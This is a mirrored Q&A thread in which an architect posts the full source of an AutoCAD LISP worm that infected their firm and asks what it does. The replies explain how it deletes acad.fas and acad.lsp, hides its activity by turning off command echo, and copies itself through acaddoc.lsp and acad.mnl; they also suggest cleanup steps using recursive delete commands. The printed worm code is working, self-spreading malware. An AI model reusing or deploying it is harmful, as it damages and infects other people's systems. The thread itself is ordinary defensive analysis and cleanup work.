调试此 LISP 病毒正在执行的操作

发布于 2024-08-14 22:56:40 字数 2222 浏览 9 评论 0原文

我的公司受到 AutoCAD 病毒的攻击,该病毒正在删除我们的 acaddoc.lsp 并将其替换为以下例程。

我是一名架构师,不太确定重复的“查找”和“删除”是做什么的。

问题

  1. 这是用什么替换文件(当前正在搜索 acadapq)?
  2. 谁为 AutoCAD 编写了病毒?!?!

有人见过这个吗? CAD 论坛不是很有帮助。

(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
      (if (vl-file-delete (findfile "acad.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
      (if (vl-file-delete (findfile "lcm.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.lsp")
      (if (vl-file-delete (findfile "acad.lsp"))
          (setq n 0))
      (setq n 2)))

(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
      (progn
        (setq wwjm (open woldacad "r"))
        (while (setq wwz (read-line wwjm))
          (write-line wwz wwjm1))
        (close wwjm)
        (close wwjm1))))

(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq ab (atoi (substr wz 4 1)))
      (close wwjm)
      (if (> ab bb)
          (setq lbz 1))))

(setq wwjqm (strcat wpath "acad.mnl"))

(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq nb (atoi (substr wz 4 1)))
      (close wwjm)
      (if (< nb bb)
          (setq lbz 1)))
    (setq lbz 1))
(if (= lbz 1)
    (progn
      (setq woldacad (strcat dpath "acaddoc.lsp"))
      (setq wnewacad (strcat wpath "acad.mnl"))
      (wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
         (/= (substr dpath 1 1) (chr 68))
         (/= (substr dpath 1 1) (chr 69))
         (/= (substr dpath 1 1) (chr 70)))
    (progn
      (setq woldacad (strcat wpath "acad.mnl"))
      (setq wnewacad (strcat dpath "acaddoc.lsp"))
      (wwriteapp))
    (vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)

My firm has been hit by an AutoCAD virus that is deleting and replacing our acaddoc.lsp with the routine below.

I'm an architect and not exactly sure what this is doing by the repetitive "find" and "deletes".

Questions

  1. What is this replacing the files with (currently searching for acadapq) ?
  2. Who writes a virus for AutoCAD?!?!

Has anyone seen this before? the CAD forums aren't very helpful.

(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
      (if (vl-file-delete (findfile "acad.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
      (if (vl-file-delete (findfile "lcm.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.lsp")
      (if (vl-file-delete (findfile "acad.lsp"))
          (setq n 0))
      (setq n 2)))

(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
      (progn
        (setq wwjm (open woldacad "r"))
        (while (setq wwz (read-line wwjm))
          (write-line wwz wwjm1))
        (close wwjm)
        (close wwjm1))))

(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq ab (atoi (substr wz 4 1)))
      (close wwjm)
      (if (> ab bb)
          (setq lbz 1))))

(setq wwjqm (strcat wpath "acad.mnl"))

(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq nb (atoi (substr wz 4 1)))
      (close wwjm)
      (if (< nb bb)
          (setq lbz 1)))
    (setq lbz 1))
(if (= lbz 1)
    (progn
      (setq woldacad (strcat dpath "acaddoc.lsp"))
      (setq wnewacad (strcat wpath "acad.mnl"))
      (wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
         (/= (substr dpath 1 1) (chr 68))
         (/= (substr dpath 1 1) (chr 69))
         (/= (substr dpath 1 1) (chr 70)))
    (progn
      (setq woldacad (strcat wpath "acad.mnl"))
      (setq wnewacad (strcat dpath "acaddoc.lsp"))
      (wwriteapp))
    (vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。

评论(3

海的爱人是光 2024-08-21 22:56:40

它支持常见 AutoCAD 自定义文件的文件路径遍历、删除和替换。 (“acad.fas”,“acad.lsp”,“acaddoc.lsp”)我不知道“lcm.fas”是什么。它是 AutoCAD 垂直产品(即 AutoCAD 机械或建筑桌面)的一部分吗?

循环本质上是“当我不断在支持路径上找到时删除它”。

据我所知,AutoCAD 没有内置防御措施。 (可能有一些 acad 系统变量停止执行这些文件)。

“cmdecho”行正在保存和恢复允许/抑制命令回显的系统变量。在运行时将其关闭(这样您就不会注意到),然后恢复原始设置。

礼貌病毒:\

当 AutoCAD 启动时,它会执行第一个“acad.fas”和“acad.fas”。它在其支持路径上找到第一个“acad.lsp”。每次 AutoCAD 加载新的 .dwg 时,它都会执行“acaddoc.lsp”。

It is doing a support file path walk, delete and replace of the common AutoCAD customization files. ("acad.fas","acad.lsp", "acaddoc.lsp") I do not know what "lcm.fas" is all about. Is it part of an AutoCAD vertical product ie AutoCAD mechanical or Architectural desktop?

The looping is essentially "while I keep finding on the support path delete it".

So far as I know AutoCAD has no built in defense against this. (There may be some acad system var that stops execution of these files).

The "cmdecho" lines are saving and restoring the system variable that allows/suppresses the echoing of commands. Turns it off while running (so you don't notice) then restores the original setting.

A polite virus :\

When AutoCAD starts up it executes the first "acad.fas" & first "acad.lsp" it finds on it's support path. Everytime AutoCAD loads a new .dwg it executes the "acaddoc.lsp".

就像说晚安 2024-08-21 22:56:40

请按照以下步骤清除此蠕虫:

手动
将附带的例程复制到您的 PC 上:acaddocfix_1.6.lsp
使用 APPLOAD 命令加载 lisp 文件
lisp 文件将自动运行,并清除支持文件夹中所有存在的蠕虫病毒。

虽然这是另一种方式,但我们可以在任何用户启动他/她的电脑时添加它作为批处理文件,因为我在

自动运行 之前与 IT 人员核实
运行防病毒软件或清理程序来删除“acaddoc.lsp”文件。通常,清洁例程会在您的 acad20XXdoc.lsp 文件中安装一个简单的例程,该例程会自动清除这些文件,但我建议首先使用防病毒软件清除所有病毒。
您还可以运行 -acaddoc.bat dos 批处理文件来手动清理所有驱动器。
运行此批处理一次,它将删除系统上的所有 acaddoc.lsp 文件。

注意:如果 Autocad 支持文件夹中的任何受感染文件是只读的,则清理器将无法清理这些文件!

请参阅http://metinsaylan.com/how -to-clean-acaddoc-lsp-virus-from-your-pc/

As Follow these steps to get rid of this worm:

Manually
Copy the attached routine on your PC: acaddocfix_1.6.lsp
Load the lisp file using APPLOAD command
The lisp file will run automatically and it will clean all the existences of the worm in your support folders.

While their is another way we can do it as a batch file by adding it once any user start his/her PC as I check with the IT before

Auto run
Run an antivirus or a cleaner to get rid of “acaddoc.lsp” files. Normally cleaner routine installs a simple routine in your acad20XXdoc.lsp file which automatically clean those files but i recommend cleaning all the viruses with an anti-virus first.
You can also run -acaddoc.bat dos batch file to clean all your drives manually.
Run this batch once and it will delete all acaddoc.lsp files on your system.

NOTE: If any of the infected files in your Autocad Support folders are READONLY the cleaner won’t be able to clean those files !!

kindly refer to http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/

冷夜 2024-08-21 22:56:40

疯狂的是,只有在网络上打开文件时才会创建 lisp 文件,本地副本似乎没有这个问题。
将 del /s acaddoc.lsp 和 del /s acad.lsp 添加到所有用户登录脚本中,并运行一周左右,它应该会清除病毒出现的所有 acaddoc.lsp 和 acad.lsp 文件。在运行删除命令之前,请确保您实际上并未将这些文件中的任何一个用于您自己的目的

The wild thing is that the lisp file only gets created when the files are opened on the network, local copies don't seem to have this issue.
add del /s acaddoc.lsp and del /s acad.lsp to all users login scripts and run this for a week or so and it should get rid of all the acaddoc.lsp and acad.lsp files which the virus coomes in...Make sure you do not actually use any of these files for your own purpose though before running the delete command

~没有更多了~
我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
原文